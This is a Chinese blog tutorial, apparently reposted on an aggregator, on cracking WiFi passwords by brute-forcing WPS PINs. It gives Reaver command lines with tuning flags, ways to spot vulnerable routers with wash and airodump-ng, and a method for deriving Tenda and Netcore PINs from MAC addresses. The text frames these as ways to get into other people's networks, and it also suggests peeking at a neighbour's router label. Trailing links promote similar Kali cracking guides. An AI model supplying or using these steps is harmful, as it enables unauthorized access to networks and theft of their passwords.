Wifi密码破解之二:利用wps漏洞穷举PIN码破解wifi密码

news/2024/11/25 15:45:41/

转自:http://xiao106347.blog.163.com/blog/static/21599207820136161132836/


Wifi密码破解2:利用wps漏洞穷举PIN码破解wifi密码 - xiao106347 - Linux 折腾笔记
 
得到PIN码,怎么破解路由的密码呢?Linux系统下我们可以使用 Reaver 软件破解出路由的密码;下图是通过路由器的PIN码得到wifi密码的效果图:
已知PIN码是   49312119
破解出密码是   #$%19283746
Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
和暴力破解密码相比,利用wps漏洞穷举pin码破解密码不像暴力破解那样全靠字典和硬件,而且就算wifi主人修改密码,只要不更换pin码,也可以很快再次得到密码,但是必须要路由支持并开启WPS功能;如何得到路由的PIN 码呢?

1.最常用的方法是用reaver软件之类的软件进行穷举PIN码,reaver 命令:
  reaver -i mon0 -b mac -S -v -n

reaver命令参数(转):
  • -i 监听后接口名称
  • -b 目标mac地址
  • -a 自动检测目标AP最佳配置
  • -S 使用最小的DH key(可以提高PJ速度)
  • -vv 显示更多的非严重警告
  • -d  即delay每穷举一次的闲置时间 预设为1秒
  • -t  即timeout每次穷举等待反馈的最长时间
  • -c  指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9  参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
一个穷举过程:
Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
在穷举的过程种reaver会生成以路由mac地址为名的wpc文件,一时半会pin不出来,第二天pin的时候命令加参数 -s file.wpc继续pin;或者多开几个终端窗口每个窗口都从不同的数字段开始pin,这样提高效率但也容易漏pin,比如   reaver -i mon0 -b mac -S -v -n -p 9000(窗口1)      reaver -i mon0 -b mac -S -v -n -p 8000 (窗口2) 。。。。。。最后得到pin码和psk 码(也就是密码),如果以后人家修给密码,只要不关闭wps功能就可以用reaver -i mon0 -b mac -p xxxxxxxx来再次得到密码。

一段时间过后,穷举出密码:
Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。
Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
判断一个wifi信号是否开启了wps可以被探测出pin码,可以用airodump-ng命令或wash命令检测:

 1).airodump-ng:MB项的那个54e.和54e,是54e.的就可以探测pin
Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
2).wash -i mon0 -C:wps locked的那个项,YES的就可以被探测pin
Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
利用wps漏洞破解wifi密码的软件还有wifite,bully等(具体看日志末尾的推荐阅读).

2.特殊路由的pin码可以通过计算得出

       有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。

比如这个:bssid :Tenda_579A18    mac :C8:3A:35:57:9A:18  通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!

Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
当然还有腾达路由pin码计算器软件:
Wifi密码破解2:通过PIN码破解wifi密码 - xiao106347 - 学习笔记
 
 
3.当然也可以假装干其他事,去人家看一下路由底部的pin码什么的。。。


http://www.ppmy.cn/news/141946.html

相关文章

【转】利用kali破解wifi密码全过程

原文地址:http://www.secbox.cn/hacker/wireless/4877.html?utm_sourcetuicool&utm_mediumreferral 作者:黑色天使 QQ:1120620069 博客:http://love-lcy.blog.163.com/ 团队:安全盒子 —————————————…

kali攻击wifi、破解wifi密码详细教程(二)

上一个博客讲了第一种wifi攻击、破解的方法 第一种方法实用性差,现在的密码都很复杂,没有好的字典成功率会很低 所以,想破解成功率高一些,就需要破解工具了 接下来就是第二种破解wifi的方法,比第一种更加实用 准备…

教你以一秒钟10万+个密码的速度破解WiFi

本文中涉及的所有技术仅供个人学习、技术交流,禁止用于非法用途!!请在国家法律允许的范围内使用!!! 本文中涉及的所有技术仅供个人学习、技术交流,禁止用于非法用途!!请…

kali rtl8812 使用airodump破解wifi密码

实验前提:安装好无线网卡。最好是kali免驱的网卡。 若不是kali免驱动网卡可借鉴以下rtl8812au操作方式 sudo apt update更新源列表apt upgrade命令将尝试下载在apt服务器上具有更新的所有软件包apt-get dist-upgrade升级系统相关依赖重启或试试以下两个驱动命令&a…

轻松掌握,板对板连接器选型指南

一、什么是板对板连接器? 板对板连接器(简称BTB),是精密电路中电源和信号耦合连接必不可少的器件。随着产品复杂度和电路设计规模的不断提升,板对板连接器也沿着市场需求向着高速率,高功率密度,轻薄化几个方向发展。 …

开源赋能 普惠未来|中软国际寄语 2023 开放原子全球开源峰会

中软国际作为行业领先的全球化软件与信息技术服务企业及数字化转型服务商,近年来积极布局开源生态(OpenHarmony、openEuler)、智能云、ERP、AIGC、教育科技、智能车六大赛道,加速业务转型创新。 中软国际为开放原子开源基金会白金…

设计模式详解之策略模式

作者:刘文慧 策略模式是一种应用广泛的行为型模式,核心思想是对算法进行封装,委派给不同对象来管理,本文将着眼于策略模式进行分享。 一、概述 我们在进行软件开发时要想实现可维护、可扩展,就需要尽量复用代码&#x…

uniapp滚动加载 下拉刷新

前言 在日常开发中,滚动加载和下拉刷新是非常常见的功能,页面数据过多时,需要滚动加载优化性能,本篇技术分享博客将介绍如何在uniapp中实现滚动加载和下拉刷新。 预览 滚动加载 下拉刷新 一、滚动加载 滚动加载指的是当用户滑…